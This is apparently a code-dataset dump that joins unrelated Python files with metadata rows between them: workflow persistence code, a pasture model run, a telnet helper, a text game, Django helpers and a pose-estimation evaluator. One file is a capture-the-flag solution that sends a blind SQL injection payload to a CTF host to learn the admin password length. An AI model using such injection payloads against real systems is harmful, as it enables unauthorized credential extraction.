self._read_record(self._incomplete_path, f).get("external_jobid", None)
for f in job.output
)
)
def metadata(self, path):
return self._read_record(self._metadata_path, path)
def version(self, path):
return self.metadata(path).get("version")
def rule(self, path):
return self.metadata(path).get("rule")
def input(self, path):
return self.metadata(path).get("input")
def log(self, path):
return self.metadata(path).get("log")
def shellcmd(self, path):
return self.metadata(path).get("shellcmd")
def params(self, path):
return self.metadata(path).get("params")
def code(self, path):
return self.metadata(path).get("code")
def version_changed(self, job, file=None):
"""Yields output files with changed versions of bool if file given."""
return _bool_or_gen(self._version_changed, job, file=file)
def code_changed(self, job, file=None):
"""Yields output files with changed code of bool if file given."""
return _bool_or_gen(self._code_changed, job, file=file)
def input_changed(self, job, file=None):
"""Yields output files with changed input of bool if file given."""
return _bool_or_gen(self._input_changed, job, file=file)
def params_changed(self, job, file=None):
"""Yields output files with changed params of bool if file given."""
return _bool_or_gen(self._params_changed, job, file=file)
def _version_changed(self, job, file=None):
assert file is not None
return self.version(file) != job.rule.version
def _code_changed(self, job, file=None):
assert file is not None
return self.code(file) != self._code(job.rule)
def _input_changed(self, job, file=None):
assert file is not None
return self.input(file) != self._input(job)
def _params_changed(self, job, file=None):
assert file is not None
return self.params(file) != self._params(job)
def noop(self, *args):
pass
def _b64id(self, s):
return urlsafe_b64encode(str(s).encode()).decode()
@lru_cache()
def _code(self, rule):
code = rule.run_func.__code__
return b64encode(pickle_code(code)).decode()
@lru_cache()
def _conda_env(self, job):
if job.conda_env:
return b64encode(job.conda_env.content).decode()
@lru_cache()
def _input(self, job):
return sorted(job.input)
@lru_cache()
def _log(self, job):
return sorted(job.log)
@lru_cache()
def _params(self, job):
return sorted(map(repr, job.params))
@lru_cache()
def _output(self, job):
return sorted(job.output)
def _record(self, subject, json_value, id):
recpath = self._record_path(subject, id)
os.makedirs(os.path.dirname(recpath), exist_ok=True)
with open(recpath, "w") as f:
json.dump(json_value, f)
def _delete_record(self, subject, id):
try:
recpath = self._record_path(subject, id)
os.remove(recpath)
recdirs = os.path.relpath(os.path.dirname(recpath), start=subject)
if recdirs != ".":
os.removedirs(recdirs)
except OSError as e:
if e.errno != 2: # not missing
raise e
@lru_cache()
def _read_record_cached(self, subject, id):
return self._read_record_uncached(subject, id)
def _read_record_uncached(self, subject, id):
if not self._exists_record(subject, id):
return dict()
with open(self._record_path(subject, id), "r") as f:
return json.load(f)
def _exists_record(self, subject, id):
return os.path.exists(self._record_path(subject, id))
def _locks(self, type):
return (
f
for f, _ in listfiles(
os.path.join(self._lockdir, "{{n,[0-9]+}}.{}.lock".format(type))
)
if not os.path.isdir(f)
)
def _lock(self, files, type):
for i in count(0):
lockfile = os.path.join(self._lockdir, "{}.{}.lock".format(i, type))
if not os.path.exists(lockfile):
self._lockfile[type] = lockfile
with open(lockfile, "w") as lock:
print(*files, sep="\n", file=lock)
return
def _record_path(self, subject, id):
max_len = (
os.pathconf(subject, "PC_NAME_MAX") if os.name == "posix" else 255
) # maximum NTFS and FAT32 filename length
if max_len == 0:
max_len = 255
b64id = self._b64id(id)
# split into chunks of proper length
b64id = [b64id[i : i + max_len - 1] for i in range(0, len(b64id), max_len - 1)]
# prepend dirs with @ (does not occur in b64) to avoid conflict with b64-named files in the same dir
b64id = ["@" + s for s in b64id[:-1]] + [b64id[-1]]
path = os.path.join(subject, *b64id)
return path
def all_outputfiles(self):
# we only look at output files that will be updated
return jobfiles(self.dag.needrun_jobs, "output")
def all_inputfiles(self):
# we consider all input files, also of not running jobs
return jobfiles(self.dag.jobs, "input")
def deactivate_cache(self):
self._read_record_cached.cache_clear()
self._read_record = self._read_record_uncached
self._incomplete_cache = False
def _bool_or_gen(func, job, file=None):
if file is None:
return (f for f in job.expanded_output if func(job, file=f))
else:
return func(job, file=file)
def pickle_code(code):
consts = [
(pickle_code(const) if type(const) == type(code) else const)
for const in code.co_consts
]
return pickle.dumps((code.co_code, code.co_varnames, consts, code.co_names))
| pt | 0.153437 | 1.741642 | 2 |
Pasture_Growth_Modelling/initialisation_support/dryland_ibasal.py | Komanawa-Solutions-Ltd/SLMACC-2020-CSRA | 0 | 13542 | """
Author: <NAME>
Created: 23/11/2020 11:06 AM
"""
import ksl_env
# add basgra nz functions
ksl_env.add_basgra_nz_path()
from supporting_functions.plotting import plot_multiple_results
from check_basgra_python.support_for_tests import establish_org_input, get_lincoln_broadfield, get_woodward_weather, _clean_harvest
from input_output_keys import matrix_weather_keys_pet
from basgra_python import run_basgra_nz
def run_nonirr_lincoln_low_basil(IBASAL):
params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln')
matrix_weather = get_lincoln_broadfield()
matrix_weather.loc[:, 'max_irr'] = 10
matrix_weather.loc[:, 'irr_trig'] = 0
matrix_weather.loc[:, 'irr_targ'] = 1
matrix_weather = matrix_weather.loc[:, matrix_weather_keys_pet]
params['IRRIGF'] = 0 # no irrigation
params['BASALI'] = IBASAL # start at 20% basal
days_harvest = _clean_harvest(days_harvest,matrix_weather)
out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False)
out.loc[:,'per_fc'] = out.loc[:,'WAL']/out.loc[:,'WAFC']
out.loc[:,'per_paw'] = out.loc[:,'PAW']/out.loc[:,'MXPAW']
return out
if __name__ == '__main__':
ibasals = [0,0.1,0.15,.2,0.3]
data = {
'IBASAL:{}'.format(e): run_nonirr_lincoln_low_basil(e) for e in ibasals
}
plot_multiple_results(data, out_vars=['BASAL', 'DM', 'YIELD','per_paw'])
| """
Author: <NAME>
Created: 23/11/2020 11:06 AM
"""
import ksl_env
# add basgra nz functions
ksl_env.add_basgra_nz_path()
from supporting_functions.plotting import plot_multiple_results
from check_basgra_python.support_for_tests import establish_org_input, get_lincoln_broadfield, get_woodward_weather, _clean_harvest
from input_output_keys import matrix_weather_keys_pet
from basgra_python import run_basgra_nz
def run_nonirr_lincoln_low_basil(IBASAL):
params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln')
matrix_weather = get_lincoln_broadfield()
matrix_weather.loc[:, 'max_irr'] = 10
matrix_weather.loc[:, 'irr_trig'] = 0
matrix_weather.loc[:, 'irr_targ'] = 1
matrix_weather = matrix_weather.loc[:, matrix_weather_keys_pet]
params['IRRIGF'] = 0 # no irrigation
params['BASALI'] = IBASAL # start at 20% basal
days_harvest = _clean_harvest(days_harvest,matrix_weather)
out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False)
out.loc[:,'per_fc'] = out.loc[:,'WAL']/out.loc[:,'WAFC']
out.loc[:,'per_paw'] = out.loc[:,'PAW']/out.loc[:,'MXPAW']
return out
if __name__ == '__main__':
ibasals = [0,0.1,0.15,.2,0.3]
data = {
'IBASAL:{}'.format(e): run_nonirr_lincoln_low_basil(e) for e in ibasals
}
plot_multiple_results(data, out_vars=['BASAL', 'DM', 'YIELD','per_paw'])
| en | 0.162423 | 2.13499 | 2 |
0x05/solve/ex1-0x05.py | tuannm-1876/sec-exercises | 0 | 13543 | <reponame>tuannm-1876/sec-exercises<gh_stars>0
import urllib
import urllib2
url = "http://ctfq.sweetduet.info:10080/~q6/"
def main():
for i in range(1, 100):
data = {
"id": "admin' AND (SELECT LENGTH(pass) FROM user WHERE id = 'admin') = {counter} --".format(counter=i),
"pass": "",
}
print (data)
data1 = urllib.urlencode(data).encode("utf-8")
req = urllib2.Request(url, data1)
res = urllib2.urlopen(req)
print (res)
if int(res.headers["content-length"]) > 2000:
print("Do dai cua password: {counter}".format(counter=i))
break
if __name__ == "__main__":
main() | import urllib
import urllib2
url = "http://ctfq.sweetduet.info:10080/~q6/"
def main():
for i in range(1, 100):
data = {
"id": "admin' AND (SELECT LENGTH(pass) FROM user WHERE id = 'admin') = {counter} --".format(counter=i),
"pass": "",
}
print (data)
data1 = urllib.urlencode(data).encode("utf-8")
req = urllib2.Request(url, data1)
res = urllib2.urlopen(req)
print (res)
if int(res.headers["content-length"]) > 2000:
print("Do dai cua password: {counter}".format(counter=i))
break
if __name__ == "__main__":
main() | none | 1 | 3.166893 | 3 |
gen_methods.py | mweeden2/desert_game | 0 | 13544 | # created by <NAME>
# 7/8/16
import classes as c
def printIntro():
print 'Welcome to the\n'
print '''__/\\\\\\\\\\\\\\\\\\\\\\\\_________________________________________________\
__________________________\n _\\/\\\\\\////////\\\\\\___________________________________\
______________________________________\n _\\/\\\\\\______\\//\\\\\\___________________\
___________________________________________/\\\\\\______\n _\\/\\\\\\_______\\/\\\\\
\\_____/\\\\\\\\\\\\\\\\___/\\\\\\\\\\\\\\\\\\\\_____/\\\\\\\\\\\\\\\\___/\\\\/\\\\\\\\\\\
\\\\___/\\\\\\\\\\\\\\\\\\\\\\_\n _\\/\\\\\\_______\\/\\\\\\___/\\\\\\/////\\\\\\_\
\\/\\\\\\//////____/\\\\\\/////\\\\\\_\\/\\\\\\/////\\\\\\_\\////\\\\\\////__\n \
_\\/\\\\\\_______\\/\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\__\\/\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\\\
\\\\\\\\\\\\__\\/\\\\\\___\\///_____\\/\\\\\\______\n _\\/\\\\\\_______/\\\\\\\
__\\//\\\\///////___\\////////\\\\\\_\\//\\\\///////___\\/\\\\\\____________\\/\\\\\\_/\\\
\\__\n _\\/\\\\\\\\\\\\\\\\\\\\\\\\/____\\//\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\
\\\\\\\\\\\\__\\//\\\\\\\\\\\\\\\\\\\\_\\/\\\\\\____________\\//\\\\\\\\\\___\n \
_\\////////////_______\\//////////__\\//////////____\\//////////__\\///____________\
__\\//\///____'''
print
print 'created by <NAME>\n'
def getUname():
done = False
while not done:
uname = raw_input("Enter your name: ")
if set(uname) <= set('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'):
if len(uname) <= 40:
done = True
else:
print 'Please keep your name to 40 letters or less'
else:
print 'Please use only letters in your name'
return uname
def createPlayer(name):
#c.Person(mainp [main character or not], name, weight, health, xp)
return c.Person(True, name, 150, 10, 100, 0)
def printIntro1(player):
msg = """==================================================
Welcome to the desert, %s.
"To survival." *clink*
"""
print msg % player.getName()
| # created by <NAME>
# 7/8/16
import classes as c
def printIntro():
print 'Welcome to the\n'
print '''__/\\\\\\\\\\\\\\\\\\\\\\\\_________________________________________________\
__________________________\n _\\/\\\\\\////////\\\\\\___________________________________\
______________________________________\n _\\/\\\\\\______\\//\\\\\\___________________\
___________________________________________/\\\\\\______\n _\\/\\\\\\_______\\/\\\\\
\\_____/\\\\\\\\\\\\\\\\___/\\\\\\\\\\\\\\\\\\\\_____/\\\\\\\\\\\\\\\\___/\\\\/\\\\\\\\\\\
\\\\___/\\\\\\\\\\\\\\\\\\\\\\_\n _\\/\\\\\\_______\\/\\\\\\___/\\\\\\/////\\\\\\_\
\\/\\\\\\//////____/\\\\\\/////\\\\\\_\\/\\\\\\/////\\\\\\_\\////\\\\\\////__\n \
_\\/\\\\\\_______\\/\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\__\\/\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\\\
\\\\\\\\\\\\__\\/\\\\\\___\\///_____\\/\\\\\\______\n _\\/\\\\\\_______/\\\\\\\
__\\//\\\\///////___\\////////\\\\\\_\\//\\\\///////___\\/\\\\\\____________\\/\\\\\\_/\\\
\\__\n _\\/\\\\\\\\\\\\\\\\\\\\\\\\/____\\//\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\
\\\\\\\\\\\\__\\//\\\\\\\\\\\\\\\\\\\\_\\/\\\\\\____________\\//\\\\\\\\\\___\n \
_\\////////////_______\\//////////__\\//////////____\\//////////__\\///____________\
__\\//\///____'''
print
print 'created by <NAME>\n'
def getUname():
done = False
while not done:
uname = raw_input("Enter your name: ")
if set(uname) <= set('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'):
if len(uname) <= 40:
done = True
else:
print 'Please keep your name to 40 letters or less'
else:
print 'Please use only letters in your name'
return uname
def createPlayer(name):
#c.Person(mainp [main character or not], name, weight, health, xp)
return c.Person(True, name, 150, 10, 100, 0)
def printIntro1(player):
msg = """==================================================
Welcome to the desert, %s.
"To survival." *clink*
"""
print msg % player.getName()
| de | 0.29206 | 2.386267 | 2 |
entity_resolution/interfaces/IRecord.py | GeoJamesJones/ArcGIS-Senzing-Prototype | 0 | 13545 | from __future__ import annotations
from abc import ABCMeta, abstractmethod
from typing import Dict, Any, List
class IRecord(metaclass=ABCMeta):
@abstractmethod
def to_dict(self) -> Dict[Any, Any]:
...
@abstractmethod
def to_json(self) -> str:
...
@abstractmethod
def to_list(self) -> List[Any]:
... | from __future__ import annotations
from abc import ABCMeta, abstractmethod
from typing import Dict, Any, List
class IRecord(metaclass=ABCMeta):
@abstractmethod
def to_dict(self) -> Dict[Any, Any]:
...
@abstractmethod
def to_json(self) -> str:
...
@abstractmethod
def to_list(self) -> List[Any]:
... | none | 1 | 2.913619 | 3 |
mkt/stats/helpers.py | Joergen/zamboni | 0 | 13546 | <filename>mkt/stats/helpers.py
from django.utils.http import urlquote
from jingo import register
import jinja2
from access import acl
@register.function
@jinja2.contextfunction
def check_contrib_stats_perms(context, addon):
request = context['request']
if addon.has_author(request.amo_user) or acl.action_allowed(request,
'RevenueStats', 'View'):
return True
@register.function
@jinja2.contextfunction
def stats_url(context, action, metric=None):
"""
Simplifies the templates a bit, no need to pass in addon into
parameters as it is inferred from the context and it makes the function
call shorter.
"""
addon = context['addon']
if metric:
action = '%s_%s' % (metric, action)
return addon.get_stats_url(action=action)
@register.function
def url_quote(url):
return urlquote(url)
| <filename>mkt/stats/helpers.py
from django.utils.http import urlquote
from jingo import register
import jinja2
from access import acl
@register.function
@jinja2.contextfunction
def check_contrib_stats_perms(context, addon):
request = context['request']
if addon.has_author(request.amo_user) or acl.action_allowed(request,
'RevenueStats', 'View'):
return True
@register.function
@jinja2.contextfunction
def stats_url(context, action, metric=None):
"""
Simplifies the templates a bit, no need to pass in addon into
parameters as it is inferred from the context and it makes the function
call shorter.
"""
addon = context['addon']
if metric:
action = '%s_%s' % (metric, action)
return addon.get_stats_url(action=action)
@register.function
def url_quote(url):
return urlquote(url)
| pt | 0.178085 | 2.01001 | 2 |
code_examples/package_example/my_scripts/network/connect_telnet.py | natenka/natenka.github.io | 18 | 13547 | import telnetlib
import time
def send_command_telnetlib(ipaddress, username, password, enable_pass, command):
t = telnetlib.Telnet("192.168.100.1")
t.read_until(b"Username:")
t.write(username.encode("ascii") + b"\n")
t.read_until(b"Password:")
t.write(password.encode("ascii") + b"\n")
t.write(b"enable\n")
t.read_until(b"Password:")
t.write(enable_pass.encode("ascii") + b"\n")
t.read_until(b"#")
t.write(b"terminal length 0\n")
t.write(command + b"\n")
time.sleep(1)
result = t.read_until(b"#").decode("utf-8")
return result
| import telnetlib
import time
def send_command_telnetlib(ipaddress, username, password, enable_pass, command):
t = telnetlib.Telnet("192.168.100.1")
t.read_until(b"Username:")
t.write(username.encode("ascii") + b"\n")
t.read_until(b"Password:")
t.write(password.encode("ascii") + b"\n")
t.write(b"enable\n")
t.read_until(b"Password:")
t.write(enable_pass.encode("ascii") + b"\n")
t.read_until(b"#")
t.write(b"terminal length 0\n")
t.write(command + b"\n")
time.sleep(1)
result = t.read_until(b"#").decode("utf-8")
return result
| none | 1 | 2.765359 | 3 |
fullstack/migrations/0004_officeholder.py | TylerFisher/full-stack-react | 9 | 13548 | <reponame>TylerFisher/full-stack-react<gh_stars>1-10
# Generated by Django 2.1.5 on 2019-01-27 22:45
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('fullstack', '0003_auto_20190127_2223'),
]
operations = [
migrations.CreateModel(
name='Officeholder',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('term_start', models.DateField()),
('term_end', models.DateField()),
('office', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Office')),
('person', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Person')),
],
),
]
| # Generated by Django 2.1.5 on 2019-01-27 22:45
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('fullstack', '0003_auto_20190127_2223'),
]
operations = [
migrations.CreateModel(
name='Officeholder',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('term_start', models.DateField()),
('term_end', models.DateField()),
('office', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Office')),
('person', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Person')),
],
),
] | fr | 0.125139 | 1.745507 | 2 |
tools/evaluate_2D.py | ZJULiHongxin/two-hand-pose-est | 0 | 13549 | <reponame>ZJULiHongxin/two-hand-pose-est
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import platform
import numpy as np
import time
import os
import torch
import torch.backends.cudnn as cudnn
import _init_paths
from config import cfg
from config import update_config
from utils.utils import get_model_summary
from ptflops import get_model_complexity_info
from fp16_utils.fp16util import network_to_half
from core.loss import BoneLengthLoss, JointAngleLoss, JointsMSELoss
import dataset
from dataset.build import trans
from models import A2JPoseNet
from utils.misc import plot_performance
import matplotlib
if platform.system() == 'Linux':
matplotlib.use('Agg')
else:
matplotlib.use('Tkagg')
# python evaluate_2D.py --cfg ../experiments/InterHand/exp_test.yaml --model_path ../output/InterHand/exp_test/model_best.pth.tar --gpu 3 --batch_size 32
def parse_args():
parser = argparse.ArgumentParser(description='Please specify the mode [training/assessment/predicting]')
parser.add_argument('--cfg',
help='experiment configure file name',
required=True,
type=str)
parser.add_argument('opts',
help="Modify cfg options using the command-line",
default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--gpu',
help='gpu id for multiprocessing training',
default=-1,
type=int)
parser.add_argument('--world-size',
default=1,
type=int,
help='number of nodes for distributed training')
parser.add_argument('--is_vis',
default=0,
type=int)
parser.add_argument('--batch_size',
default=32,
type=int)
parser.add_argument('--model_path', default='', type=str)
args = parser.parse_args()
return args
def main():
args = parse_args()
update_config(cfg, args)
cfg.defrost()
cfg.freeze()
file_path = './eval_results'
if not os.path.exists(file_path):
os.mkdir(file_path)
record_prefix = os.path.join(file_path, 'eval2D_results_')
if args.is_vis:
result_dir = record_prefix + cfg.EXP_NAME
mse2d_lst = np.loadtxt(os.path.join(result_dir, 'mse2d_each_joint.txt'))
PCK2d_lst = np.loadtxt(os.path.join(result_dir, 'PCK2d.txt'))
plot_performance(PCK2d_lst[1,:], PCK2d_lst[0,:], mse2d_lst)
exit()
cudnn.benchmark = cfg.CUDNN.BENCHMARK
torch.backends.cudnn.deterministic = cfg.CUDNN.DETERMINISTIC
torch.backends.cudnn.enabled = cfg.CUDNN.ENABLED
model_path = args.model_path
is_vis = args.is_vis
# FP16 SETTING
if cfg.FP16.ENABLED:
assert torch.backends.cudnn.enabled, "fp16 mode requires cudnn backend to be enabled."
if cfg.FP16.STATIC_LOSS_SCALE != 1.0:
if not cfg.FP16.ENABLED:
print("Warning: if --fp16 is not used, static_loss_scale will be ignored.")
model = eval(cfg.MODEL.NAME)(cfg)
if cfg.FP16.ENABLED:
model = network_to_half(model)
if cfg.MODEL.SYNC_BN and not args.distributed:
print('Warning: Sync BatchNorm is only supported in distributed training.')
if args.gpu != -1:
device = torch.device('cuda:'+str(args.gpu))
torch.cuda.set_device(args.gpu)
else:
device = torch.device('cpu')
# load model state
if model_path:
print("Loading model:", model_path)
ckpt = torch.load(model_path, map_location='cpu')
if 'state_dict' not in ckpt.keys():
state_dict = ckpt
else:
state_dict = ckpt['state_dict']
print('Model epoch {}'.format(ckpt['epoch']))
for key in list(state_dict.keys()):
new_key = key.replace("module.", "")
state_dict[new_key] = state_dict.pop(key)
model.load_state_dict(state_dict, strict=True)
model.to(device)
model.eval()
# inference_dataset = eval('dataset.{}'.format(cfg.DATASET.TEST_DATASET[0].replace('_kpt','')))(
# cfg.DATA_DIR,
# cfg.DATASET.TEST_SET,
# transform=transform
# )
inference_dataset = eval('dataset.{}'.format(cfg.DATASET.DATASET_NAME))(
cfg,
transforms=trans,
mode='test'
)
batch_size = args.batch_size
if platform.system() == 'Linux':
main_workers = min(8, batch_size)
else:
batch_size = 4
main_workers = 0
data_loader = torch.utils.data.DataLoader(
inference_dataset,
batch_size=batch_size, #48
shuffle=False,
num_workers=main_workers, #8
pin_memory=False
)
print('\nEvaluation loader information:\n' + str(data_loader.dataset))
n_joints = cfg.DATASET.NUM_JOINTS
th2d_lst = np.array([i for i in range(1,50)])
PCK2d_lst = np.zeros((len(th2d_lst),))
# two hands
mse2d_lst = np.zeros((2*n_joints,))
visibility_lst = np.zeros((2*n_joints,))
print('Start evaluating... [Batch size: {}]\n'.format(data_loader.batch_size))
with torch.no_grad():
pose2d_mse_loss = JointsMSELoss().to(device)
infer_time = [0,0]
start_time = time.time()
for i, ret in enumerate(data_loader):
# imgs: b x 3 x H x W
# pose2d_gt: b x 42 x 3 [u,v,z]
# hand_type: b x 2 ([1,0] for right, [0,1] for left and [1,1] for interacting hands)
# pose_valid: b x 42
imgs, pose2d_gt = ret['imgs'].cuda(device, non_blocking=True), ret['pose2d_gt']
hand_type, pose_valid = ret['hand_type'], ret['joint_valid'].numpy()
s1 = time.time()
batch_size = imgs.shape[0]
# cls: b x w*h*n_anchors x 42
# pose_pred: B x 42 x 2
# reg: B x w*h*n_anchors x 42 x 2
pose2d_pred, surrounding_anchors_pred, cls_pred, reg, temperature = model(imgs)
if i+1 >= min(len(data_loader), 20):
infer_time[0] += 1
infer_time[1] += time.time() - s1
# rescale to the original image before DLT
# for k in range(21):
# print(pose2d_gt[0,k].tolist(), pose2d_pred[0,k].tolist())
# input()
# 2D errors
# import matplotlib.pyplot as plt
# imgs = cv2.resize(imgs[0].permute(1,2,0).cpu().numpy(), tuple(data_loader.dataset.orig_img_size))
# for k in range(21):
# print(pose2d_gt[0,k],pose2d_pred[0,k],visibility[0,k])
# for k in range(0,21,5):
# fig = plt.figure()
# ax1 = fig.add_subplot(131)
# ax2 = fig.add_subplot(132)
# ax3 = fig.add_subplot(133)
# ax1.imshow(cv2.cvtColor(imgs / imgs.max(), cv2.COLOR_BGR2RGB))
# plot_hand(ax1, pose2d_gt[0,:,0:2], order='uv')
# ax2.imshow(cv2.cvtColor(imgs / imgs.max(), cv2.COLOR_BGR2RGB))
# plot_hand(ax2, pose2d_pred[0,:,0:2], order='uv')
# ax3.imshow(heatmaps_pred[0,k].cpu().numpy())
# plt.show()
mse_each_joint = np.linalg.norm(pose2d_pred[:,:,0:2].cpu().numpy() - pose2d_gt[:,:,0:2].numpy(), axis=2) * pose_valid # b x 42
mse2d_lst += mse_each_joint.sum(axis=0)
visibility_lst += pose_valid.sum(axis=0)
for th_idx in range(len(th2d_lst)):
PCK2d_lst[th_idx] += np.sum((mse_each_joint < th2d_lst[th_idx]) * pose_valid)
period = min(len(data_loader), 10)
if i % (len(data_loader)//period) == 0:
print("[Evaluation]{}% finished.".format(period * i // (len(data_loader)//period)))
#if i == 10:break
print('Evaluation spent {:.2f} s\tfps: {:.1f} {:.4f}'.format(time.time()-start_time, infer_time[0]/infer_time[1], infer_time[1]/infer_time[0]))
mse2d_lst /= visibility_lst
PCK2d_lst /= visibility_lst.sum()
result_dir = record_prefix+cfg.EXP_NAME
if not os.path.exists(result_dir):
os.mkdir(result_dir)
mse_file, pck_file = os.path.join(result_dir, 'mse2d_each_joint.txt'), os.path.join(result_dir, 'PCK2d.txt')
print('Saving results to ' + mse_file)
print('Saving results to ' + pck_file)
np.savetxt(mse_file, mse2d_lst, fmt='%.4f')
np.savetxt(pck_file, np.stack((th2d_lst, PCK2d_lst)))
plot_performance(PCK2d_lst, th2d_lst, mse2d_lst, hand_type='interacting')
main() | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import platform
import numpy as np
import time
import os
import torch
import torch.backends.cudnn as cudnn
import _init_paths
from config import cfg
from config import update_config
from utils.utils import get_model_summary
from ptflops import get_model_complexity_info
from fp16_utils.fp16util import network_to_half
from core.loss import BoneLengthLoss, JointAngleLoss, JointsMSELoss
import dataset
from dataset.build import trans
from models import A2JPoseNet
from utils.misc import plot_performance
import matplotlib
if platform.system() == 'Linux':
matplotlib.use('Agg')
else:
matplotlib.use('Tkagg')
# python evaluate_2D.py --cfg ../experiments/InterHand/exp_test.yaml --model_path ../output/InterHand/exp_test/model_best.pth.tar --gpu 3 --batch_size 32
def parse_args():
parser = argparse.ArgumentParser(description='Please specify the mode [training/assessment/predicting]')
parser.add_argument('--cfg',
help='experiment configure file name',
required=True,
type=str)
parser.add_argument('opts',
help="Modify cfg options using the command-line",
default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--gpu',
help='gpu id for multiprocessing training',
default=-1,
type=int)
parser.add_argument('--world-size',
default=1,
type=int,
help='number of nodes for distributed training')
parser.add_argument('--is_vis',
default=0,
type=int)
parser.add_argument('--batch_size',
default=32,
type=int)
parser.add_argument('--model_path', default='', type=str)
args = parser.parse_args()
return args
def main():
args = parse_args()
update_config(cfg, args)
cfg.defrost()
cfg.freeze()
file_path = './eval_results'
if not os.path.exists(file_path):
os.mkdir(file_path)
record_prefix = os.path.join(file_path, 'eval2D_results_')
if args.is_vis:
result_dir = record_prefix + cfg.EXP_NAME
mse2d_lst = np.loadtxt(os.path.join(result_dir, 'mse2d_each_joint.txt'))
PCK2d_lst = np.loadtxt(os.path.join(result_dir, 'PCK2d.txt'))
plot_performance(PCK2d_lst[1,:], PCK2d_lst[0,:], mse2d_lst)
exit()
cudnn.benchmark = cfg.CUDNN.BENCHMARK
torch.backends.cudnn.deterministic = cfg.CUDNN.DETERMINISTIC
torch.backends.cudnn.enabled = cfg.CUDNN.ENABLED
model_path = args.model_path
is_vis = args.is_vis
# FP16 SETTING
if cfg.FP16.ENABLED:
assert torch.backends.cudnn.enabled, "fp16 mode requires cudnn backend to be enabled."
if cfg.FP16.STATIC_LOSS_SCALE != 1.0:
if not cfg.FP16.ENABLED:
print("Warning: if --fp16 is not used, static_loss_scale will be ignored.")
model = eval(cfg.MODEL.NAME)(cfg)
if cfg.FP16.ENABLED:
model = network_to_half(model)
if cfg.MODEL.SYNC_BN and not args.distributed:
print('Warning: Sync BatchNorm is only supported in distributed training.')
if args.gpu != -1:
device = torch.device('cuda:'+str(args.gpu))
torch.cuda.set_device(args.gpu)
else:
device = torch.device('cpu')
# load model state
if model_path:
print("Loading model:", model_path)
ckpt = torch.load(model_path, map_location='cpu')
if 'state_dict' not in ckpt.keys():
state_dict = ckpt
else:
state_dict = ckpt['state_dict']
print('Model epoch {}'.format(ckpt['epoch']))
for key in list(state_dict.keys()):
new_key = key.replace("module.", "")
state_dict[new_key] = state_dict.pop(key)
model.load_state_dict(state_dict, strict=True)
model.to(device)
model.eval()
# inference_dataset = eval('dataset.{}'.format(cfg.DATASET.TEST_DATASET[0].replace('_kpt','')))(
# cfg.DATA_DIR,
# cfg.DATASET.TEST_SET,
# transform=transform
# )
inference_dataset = eval('dataset.{}'.format(cfg.DATASET.DATASET_NAME))(
cfg,
transforms=trans,
mode='test'
)
batch_size = args.batch_size
if platform.system() == 'Linux':
main_workers = min(8, batch_size)
else:
batch_size = 4
main_workers = 0
data_loader = torch.utils.data.DataLoader(
inference_dataset,
batch_size=batch_size, #48
shuffle=False,
num_workers=main_workers, #8
pin_memory=False
)
print('\nEvaluation loader information:\n' + str(data_loader.dataset))
n_joints = cfg.DATASET.NUM_JOINTS
th2d_lst = np.array([i for i in range(1,50)])
PCK2d_lst = np.zeros((len(th2d_lst),))
# two hands
mse2d_lst = np.zeros((2*n_joints,))
visibility_lst = np.zeros((2*n_joints,))
print('Start evaluating... [Batch size: {}]\n'.format(data_loader.batch_size))
with torch.no_grad():
pose2d_mse_loss = JointsMSELoss().to(device)
infer_time = [0,0]
start_time = time.time()
for i, ret in enumerate(data_loader):
# imgs: b x 3 x H x W
# pose2d_gt: b x 42 x 3 [u,v,z]
# hand_type: b x 2 ([1,0] for right, [0,1] for left and [1,1] for interacting hands)
# pose_valid: b x 42
imgs, pose2d_gt = ret['imgs'].cuda(device, non_blocking=True), ret['pose2d_gt']
hand_type, pose_valid = ret['hand_type'], ret['joint_valid'].numpy()
s1 = time.time()
batch_size = imgs.shape[0]
# cls: b x w*h*n_anchors x 42
# pose_pred: B x 42 x 2
# reg: B x w*h*n_anchors x 42 x 2
pose2d_pred, surrounding_anchors_pred, cls_pred, reg, temperature = model(imgs)
if i+1 >= min(len(data_loader), 20):
infer_time[0] += 1
infer_time[1] += time.time() - s1
# rescale to the original image before DLT
# for k in range(21):
# print(pose2d_gt[0,k].tolist(), pose2d_pred[0,k].tolist())
# input()
# 2D errors
# import matplotlib.pyplot as plt
# imgs = cv2.resize(imgs[0].permute(1,2,0).cpu().numpy(), tuple(data_loader.dataset.orig_img_size))
# for k in range(21):
# print(pose2d_gt[0,k],pose2d_pred[0,k],visibility[0,k])
# for k in range(0,21,5):
# fig = plt.figure()
# ax1 = fig.add_subplot(131)
# ax2 = fig.add_subplot(132)
# ax3 = fig.add_subplot(133)
# ax1.imshow(cv2.cvtColor(imgs / imgs.max(), cv2.COLOR_BGR2RGB))
# plot_hand(ax1, pose2d_gt[0,:,0:2], order='uv')
# ax2.imshow(cv2.cvtColor(imgs / imgs.max(), cv2.COLOR_BGR2RGB))
# plot_hand(ax2, pose2d_pred[0,:,0:2], order='uv')
# ax3.imshow(heatmaps_pred[0,k].cpu().numpy())
# plt.show()
